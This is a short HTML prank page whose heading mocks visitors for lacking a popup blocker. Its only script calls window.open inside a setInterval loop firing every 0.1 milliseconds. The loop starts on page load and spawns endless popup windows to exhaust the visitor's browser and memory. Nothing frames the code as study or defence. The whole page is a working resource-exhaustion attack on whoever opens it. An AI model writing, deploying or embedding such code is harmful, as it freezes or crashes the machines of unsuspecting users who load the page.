<!DOCTYPE html>
<html lang="en">
<head>
    <script src="../style/style.css"></script>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
    <h1>lol if your on this page rip your pc and you have a no popup blocker your ram is dead</h1>


    <script>
        setInterval(function() {  var myWindow = window.open("", "", "width=200, height=100")  }, 0.1);
    </script>
</body>
</html>